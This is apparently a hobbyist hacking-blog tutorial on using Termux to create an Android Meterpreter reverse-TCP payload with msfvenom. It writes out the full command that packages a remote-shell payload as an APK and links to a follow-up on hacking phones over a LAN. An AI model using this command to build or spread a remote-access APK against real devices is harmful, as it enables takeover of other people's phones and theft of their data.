Creating a Payload in Metasploit using Termux

Hi friends Welcome back!! Today we gonna a discuss about creating a payload in metasploit framework by using Termux Application but before starting this take a look at my previous post which is about How to install metasploit framework in Termux.

Before getting started you should Know about the meaning of Payload.

What is Payload ?
Basically, it is a script, code, or module that are used to execute an attack against a vulnerability.

Actually, Metasploit features has massive assortment of payloads designed for every kind of eventualities however we are going to discuss those payloads another day.

Creating a Payload:
Before creating a payload first go to metasploit framework directory by typing cd < your metasploit framework directory name > and type msfconsole you will see a screen like this.

To Create a Payload write the command given below.

Note: Below command is used to make a payload for LAN Network only. This payload will not worked on Internet.

msfvenom -p android/meterpreter/reverse_tcp LHOST= LPORT=1234 R > /sdcard/hackmingtest.apk

In this command -p stands for Payload, LHOST & LPORT are LocalHOST & LocalPORT respectively and in last we have given a path of our payload in sdcard which is named as hackmingtest.apk. Let me show you a screenshot of my mobile to see how it will look like

As you can see hackmingtest.apk file has been created. Next process i will be able to tell you in my next post how you can use this payload for exploitation. See this how to hack android phone on LAN using termux.  I'm creating this post for instructional purpose solely don't misuse this.

Note: Never ever install .apk extension file from Unknown sources or websites. I strictly suggest you to use Google Play Store for installing any android application.

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Till Now Good Bye and Take Care.

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I am a blogger and Tech Geek and hacking lover. He loves to keep eyes on Hacking tips and tricks. He is a night time tech blogger."(Blogger by Passion)"

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